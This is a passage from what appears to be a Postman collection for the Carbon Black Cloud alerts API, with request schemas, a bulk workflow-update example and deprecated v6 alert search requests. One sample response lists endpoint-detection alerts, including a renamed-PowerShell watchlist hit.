\"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"start\": &lt;long&gt;,\n  \"rows\": &lt;long&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","workflow"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"cc2a056c-7c6c-4bf6-9768-faac7818256a","name":"Bulk update alerts workflow by search definition","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"id\": [\n            \"{{cb_alert_id}}\"\n        ]\n    },\n    \"determination\": \"NONE\",\n    \"closure_reason\": \"OTHER\",\n    \"status\": \"OPEN\",\n    \"note\": \"Testing Postman - return to NONE\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/workflow"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 18 Apr 2023 02:28:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"28"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=21C167CA4034ADE2F546048DB8C6F1CA; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"request_id\": \"5372752\"\n}"}],"_postman_id":"32ea4c8c-e9ac-4cc9-abdf-550381467f40"}],"id":"5bb400de-fa54-44e5-a062-121c3827ffff","_postman_id":"5bb400de-fa54-44e5-a062-121c3827ffff","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Deprecated - v6","item":[{"name":"Alert Search","id":"d6a90ef6-731f-4fc5-a2e3-972d24a8f0df","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"group_results\": true,\n        \"minimum_severity\": 3,\n        \"create_time\": {\n        \t\"start\": \"2020-01-27T23:10:20.814Z\",\n        \t\"end\": \"2020-01-27T23:10:25.814Z\"\n        }\n    },\n\t\"sort\": [{\"field\": \"first_event_time\", \"order\": \"DESC\"}],\n    \"rows\": 10,\n    \"start\": 0\n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/_search","description":"<p>Alert search request. Multiple pathways support similar request body schemas.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<hr />\n<p>🔸 Examples provided</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"aa8b827c-9761-4365-ab7e-de13e5859d04","name":"Get Alerts Ordered by First Event Time","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"","value":"","type":"text","disabled":true}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"group_results\": true,\n        \"minimum_severity\": 3,\n        \"create_time\": {\n            \"start\": \"2020-01-27T23:10:20.814Z\",\n            \"end\": \"2020-01-27T23:10:25.814Z\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"first_event_time\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"rows\": 10,\n    \"start\": 0\n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sat, 18 Apr 2020 23:22:01 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"4714"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Server","value":"Apache-Coyote/1.1"},{"key":"Set-Cookie","value":"JSESSIONID=4EDF0D659A9DAF503448A1F1E1BCDD77; Path=/appservices; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"4A0AD9BAE59E5187729FB63115807BC3\",\n            \"legacy_alert_id\": \"7DESJ9GN-00313c93-0000017c-00000000-1d5d56636374838-MLRtPcpQGKFh5OE4BT3tQ-19d3af31-5dbd-4b9f-9b1d-e8ddca6af991\",\n            \"org_key\": \"7DESJ9GN\",\n            \"create_time\": \"2020-01-27T23:10:21.814Z\",\n            \"last_update_time\": null,\n            \"first_event_time\": \"2020-01-27T23:05:09.029Z\",\n            \"last_event_time\": \"2020-01-27T23:05:09.029Z\",\n            \"threat_id\": \"7BF2B848FE2936224483F214414EFDFB\",\n            \"severity\": 9,\n            \"category\": \"THREAT\",\n            \"device_id\": 3226771,\n            \"device_os\": \"WINDOWS\",\n            \"device_os_version\": null,\n            \"device_name\": \"CIGENT-DGC7\",\n            \"device_username\": \"IEUser\",\n            \"policy_id\": 33819,\n            \"policy_name\": \"Cigent Policy 1\",\n            \"target_value\": \"HIGH\",\n            \"workflow\": {\n                \"state\": \"OPEN\",\n                \"remediation\": null,\n                \"last_update_time\": \"2020-01-27T23:10:21.847Z\",\n                \"comment\": null,\n                \"changed_by\": \"Carbon Black\"\n            },\n            \"notes_present\": false,\n            \"tags\": null,\n            \"group_details\": {\n                \"total_devices\": 1,\n                \"count\": 1\n            },\n            \"reason\": \"Script Processors Renamed - Powershell\",\n            \"count\": 0,\n            \"report_id\": \"MLRtPcpQGKFh5OE4BT3tQ-19d3af31-5dbd-4b9f-9b1d-e8ddca6af991\",\n            \"report_name\": \"Script Processors Renamed - Powershell\",\n            \"ioc_id\": \"19d3af31-5dbd-4b9f-9b1d-e8ddca6af991-0\",\n            \"ioc_field\": null,\n            \"ioc_hit\": \"(process_original_filename:PowerShell.EXE* -process_name:powershell.exe) -legacy:true\",\n            \"watchlists\": [\n                {\n                    \"id\": \"MXzJPzWYRuuKBEsy0UXImA\",\n                    \"name\": \"Cigent Watchlist\"\n                },\n                {\n                    \"id\": \"mrTB06fAQbeNfvl47cQiGg\",\n                    \"name\": \"Carbon Black Advanced Threats\"\n                }\n            ],\n            \"process_guid\": \"7DESJ9GN-00313c93-0000017c-00000000-1d5d56636374838\",\n            \"process_name\": \"localpowershell.exe\",\n            \"run_state\": \"RAN\",\n            \"threat_indicators\": [\n                {\n                    \"process_name\": \"localpowershell.exe\",\n                    \"sha256\": \"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\n                    \"ttps\": [\n                        \"19d3af31-5dbd-4b9f-9b1d-e8ddca6af991-0\"\n                    ]\n                }\n            ],\n            \"threat_cause_actor_sha256\": \"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\n            \"threat_cause_actor_md5\": \"7353f60b1739074eb17c5f4dddefe239\",\n            \"threat_cause_actor_name\": \"localpowershell.exe\",\n            \"threat_cause_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"threat_cause_threat_category\": null,\n            \"threat_cause_vector\": \"UNKNOWN\",\n            \"document_guid\": \"rkjzBzTEQtmMxxF5s7eREQ\",\n            \"type\": \"WATCHLIST\"\n        },\n        {\n            \"id\": \"B170C3298FC24F16897CF06BBFF0CD22\",\n            \"legacy_alert_id\": \"7DESJ9GN-002efa5e-000018ec-00000000-1d5cda0addb718b-A59huyinQSmAr8t1a2hpg\",\n            \"org_key\": \"7DESJ9GN\",\n            \"create_time\": \"2020-01-27T23:10:21.647Z\",\n            \"last_update_time\": null,\n            \"first_event_time\": \"2020-01-27T22:59:40.121Z\",\n            \"last_event_time\": \"2020-01-27T23:00:16.755Z\",\n            \"threat_id\": \"AD523AEB5432A41F4BD3B483720B932E\",\n            \"severity\": 8,\n            \"category\": \"THREAT\",\n            \"device_id\": 3078750,\n            \"device_os\": \"WINDOWS\",\n            \"device_os_version\": null,\n            \"device_name\": \"Windows-10-32bit\",\n            \"device_username\": \"manwin1032\",\n            \"policy_id\": 6525,\n            \"policy_name\": \"default\",\n            \"target_value\": \"MEDIUM\",\n            \"workflow\": {\n                \"state\": \"OPEN\",\n                \"remediation\": null,\n                \"last_update_time\": \"2020-01-27T23:10:21.683Z\",\n                \"comment\": null,\n                \"changed_by\": \"Carbon Black\"\n            },\n            \"notes_present\": false,\n            \"tags\": null,\n            \"group_details\": {\n                \"total_devices\": 2,\n                \"count\": 6\n            },\n            \"reason\": \"badfile.exe.exe\",\n            \"count\": 0,\n            \"report_id\": \"A59huyinQSmAr8t1a2hpg\",\n            \"report_name\": \"badfile.exe.exe\",\n            \"ioc_id\": \"860ececb-2a2e-4dc5-bdbd-f6f45657cf7c\",\n            \"ioc_field\": null,\n            \"ioc_hit\": \"(process_name:chrome.exe)\",\n            \"watchlists\": [\n                {\n                    \"id\": \"JI5wCDVTPGEgbWlDCoGgQ\",\n                    \"name\": \"Sample badfile.exe.exe Watchlist\"\n                }\n            ],\n            \"process_guid\": \"7DESJ9GN-002efa5e-000018ec-00000000-1d5cda0addb718b\",\n            \"process_name\": \"chrome.exe\",\n            \"run_state\": \"RAN\",\n            \"threat_indicators\": [\n                {\n                    \"process_name\": \"chrome.exe\",\n                    \"sha256\": \"7cca896c76e30f6286fb01c8b2d9b56afd3eca3e24cf7ad42e5a929d44457a07\",\n                    \"ttps\": [\n                        \"860ececb-2a2e-4dc5-bdbd-f6f45657cf7c\"\n                    ]\n                }\n            ],\n            \"threat_cause_actor_sha256\": \"7cca896c76e30f6286fb01c8b2d9b56afd3eca3e24cf7ad42e5a929d44457a07\",\n            \"threat_cause_actor_md5\": \"70d6971cfc8b736116e9aa60b6cc6fd2\",\n            \"threat_cause_actor_name\": \"chrome.exe\",\n            \"threat_cause_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"threat_cause_threat_category\": null,\n            \"threat_cause_vector\": \"UNKNOWN\",\n            \"document_guid\": \"z0C5W_roQf2wTlnBUlId3Q\",\n            \"type\": \"WATCHLIST\"\n        }\n    ],\n    \"num_found\": 2\n}"}],"_postman_id":"d6a90ef6-731f-4fc5-a2e3-972d24a8f0df"},{"name":"Get Alert by ID","id":"5e5e308a-56e1-4157-9d2f-61ae920752fa","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}","description":"<p>Get a single alert using an ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#get-single-alert-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5e5e308a-56e1-4157-9d2f-61ae920752fa"},{"name":"Facet Alerts","id":"40590453-74e7-4570-8a31-f835ab376115","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"category\": [\"<string>\", \"<string>\"],\n        \"create_time\": {\n            \"end\": \"<dateTime>\",\n            \"range\": \"<string>\",\n            \"start\": \"<dateTime>\"\n        },\n        \"device_id\": [\"<long>\", \"<long>\"],\n        \"device_name\": [\"<string>\", \"<string>\"],\n        \"device_os\": [\"<string>\", \"<string>\"],\n        \"device_os_version\": [\"<string>\", \"<string>\"],\n        \"device_username\": [\"<string>\", \"<string>\"],\n        \"first_event_time\": {\n            \"end\": \"<dateTime>\",\n            \"range\": \"<string>\",\n            \"start\": \"<dateTime>\"\n        },\n        \"group_results\": \"<boolean>\",\n        \"id\": [\"<string>\", \"<string>\"],\n        \"last_event_time\": {\n            \"end\": \"<dateTime>\",\n            \"range\": \"<string>\",\n            \"start\": \"<dateTime>\"\n        },\n        \"legacy_alert_id\": [\"<string>\", \"<string>\"],\n        \"minimum_severity\": \"<integer>\",\n        \"policy_id\": [\"<long>\", \"<long>\"],\n        \"policy_name\": [\"<string>\", \"<string>\"],\n        \"process_name\": [\"<string>\", \"<string>\"],\n        \"process_sha256\": [\"<string>\", \"<string>\"],\n        \"reputation\": [\"<string>\", \"<string>\"],\n        \"tag\": [\"<string>\", \"<string>\"],\n        \"target_value\": [\"<string>\", \"<string>\"],\n        \"threat_id\": [\"<string>\", \"<string>\"],\n        \"type\": [\"<string>\", \"<string>\"],\n        \"last_update_time\": {\n            \"end\": \"<dateTime>\",\n            \"range\": \"<string>\",\n            \"start\": \"<dateTime>\"\n        },\n        \"workflow\": [\"<string>\", \"<string>\"],\n    },\n    \"query\": \"<string>\",\n    \"terms\": {\n        \"fields\": [\"<string>\", \"<string>\"],\n        \"rows\": \"<integer>\"\n    }\n}\n"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/alerts/_facet","description":"<p>Alert facets search request. Multiple pathways support similar request body schemas, including those listed below.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#facet-alerts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud 